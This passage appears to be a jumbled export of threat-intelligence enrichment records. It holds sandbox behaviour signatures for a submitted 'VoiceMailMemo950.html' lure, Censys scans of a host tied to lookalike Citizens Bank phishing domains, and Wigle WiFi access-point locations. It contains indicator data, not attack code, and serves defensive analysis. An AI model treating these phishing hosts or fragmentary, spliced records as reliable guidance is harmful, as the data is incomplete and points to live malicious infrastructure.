u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00001724)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003900)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003152)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /assets/img/favicons/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zaratec.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/img/favicons/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zaratec.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_718_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\LRIEElevationPolicyMutex"\n "IsoScope_718_IE_EarlyTabStart_0x66c_Mutex"\n "IsoScope_718_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_718_ConnHashTable<1816>_HashTable_Mutex"\n "IsoScope_718_IESQMMUTEX_0_303"\n "IsoScope_718_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1816"\n "Local\\VERMGMTBlockListFileMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "SmartScreen_ClientId_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "CommunicationManager_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00001724)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003900)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003152)\n Spawned process "RdrCEF.exe" with commandline "--backgroundcolor=16448250" (UID: 00000000-00001728)\n Spawned process "RdrCEF.exe" with commandline "--type=renderer --primordial-pipe-token=7BEE27BC222632A4E79EAB52 ..." (UID: 00000000-00002344)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar889D.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar884D.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1546/015', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1546.015', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" touched "UsersFiles" (Path: "HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "rundll32.exe" touched "Adobe Acrobat Document" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B801CA65-A1FC-11D0-85AD-444553540000}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "rundll32.exe" touched "Enhanced Storage Icon Overlay Handler Class" (Path: "HKCU\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 1 (GFS Unread Stub)" (Path: "HKCU\\CLSID\\{99FD978C-D287-4F50-827F-B2C658EDA8E7}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{920E6DB1-9907-4370-B3A0-BAFC03D81399}\\PROGID")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2 (GFS Stub)" (Path: "HKCU\\CLSID\\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 4 (GFS Unread Mark)" (Path: "HKCU\\CLSID\\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 3 (GFS Folder)" (Path: "HKCU\\CLSID\\{16F3DD56-1AF5-4347-846D-7C10C4192619}\\INPROCSERVER32")\n "rundll32.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")\n "rundll32.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "rundll32.exe" touched "Start Menu Cache" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\INPROCHANDLER")\n "rundll32.exe" touched "Start Menu Pin" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\INPROCSERVER32")\n "rundll32.exe" touched "Taskband Pin" (Path: "HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS")\n "rundll32.exe" touched "Shortcut" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Internet Shortcut" (Path: "HKCU\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "User Pinned" (Path: "HKCU\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\SHELLFOLDER")\n "rundll32.exe" touched "Shell File System Folder" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\\INPROCSERVER32")\n "rundll32.exe" touched "User Assist" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\PROGID")\n "rundll32.exe" touched "Shared Task Scheduler" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab889C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab884C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-25', u'name': u'Reads information about supported languages', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE"; Key: "00000409")\n "rundll32.exe" ( | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3019fc (Net ID: 00:02:2D:30:19:FC) | 37.7642, -122.3993 |
| 2023-05-12 02:47:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'VoiceMailMemo950.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC81A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "207.241.228.150:443"\n "13.227.74.44:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"getbootstrap.com"\n "ia801500.us.archive.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_e88_IESQMMUTEX_0_519"\n "IsoScope_e88_IESQMMUTEX_0_331"\n "IsoScope_e88_IE_EarlyTabStart_0xcf0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e88_ConnHashTable<3720>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3720"\n "IsoScope_e88_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /34/items/7164025490-20221107-091147/7164025490_20221107_091147.mp3 HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept: */*\nGetContentFeatures.DLNA.ORG: 1\nPragma: getIfoFileURI.dlna.org\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nHost: ia801500.us.archive.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /34/items/7164025490-20221107-091147/7164025490_20221107_091147.mp3 HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept: */*\nGetContentFeatures.DLNA.ORG: 1\nPragma: getIfoFileURI.dlna.org\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nHost: ia801500.us.archive.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OGFMCCVK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OGFMCCVK.txt]- [targetUID: 00000000-00003720]\n Dropped file: "TFIYPCCB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TFIYPCCB.txt]- [targetUID: 00000000-00003720]\n Dropped file: "S5GOY3AO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S5GOY3AO.txt]- [targetUID: 00000000-00003192]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003720]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003192]\n "signin_1_.css" has type "ASCII text"- [targetUID: 00000000-00003720]\n "_52898875-9CDE-11ED-967C-080027BEA5A3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "~DF942F6CCF20CCC8F3.TMP" has type "data"- Location: [%TEMP%\\~DF942F6CCF20CCC8F3.TMP]- [targetUID: 00000000-00003720]\n "_5CEA68F8-9CDE-11ED-967C-080027BEA5A3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "~DF48F06A6EB7E1A5AD.TMP" has type "data"- Location: [%TEMP%\\~DF48F06A6EB7E1A5AD.TMP]- [targetUID: 00000000-00003720]\n "OGFMCCVK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OGFMCCVK.txt]- [targetUID: 00000000-00003720]\n "TFIYPCCB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TFIYPCCB.txt]- [targetUID: 00000000-00003720]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00003720]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "~DF3C3963D5684B734E.TMP" has type "data"- Location: [%TEMP%\\~DF3C3963D5684B734E.TMP]- [targetUID: 00000000-00003720]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003720]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003720]\n "S5GOY3AO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S5GOY3AO.txt]- [targetUID: 00000000-00003192]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003192]\n "RecoveryStore._52898873-9CDE-11ED-967C-080027BEA5A3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003720]\n "TarC81A.tmp" has type "data"- Location: [%TEMP%\\TarC81A.tmp]- [targetUID: 00000000-00003192]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:42) | 37.7642, -122.3993 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c57480ebf7f3732-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:1B) | 41.8781, -87.6298 |
| 2023-05-12 02:55:18 | Raw Data from RIRs | No | Censys | 13 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": 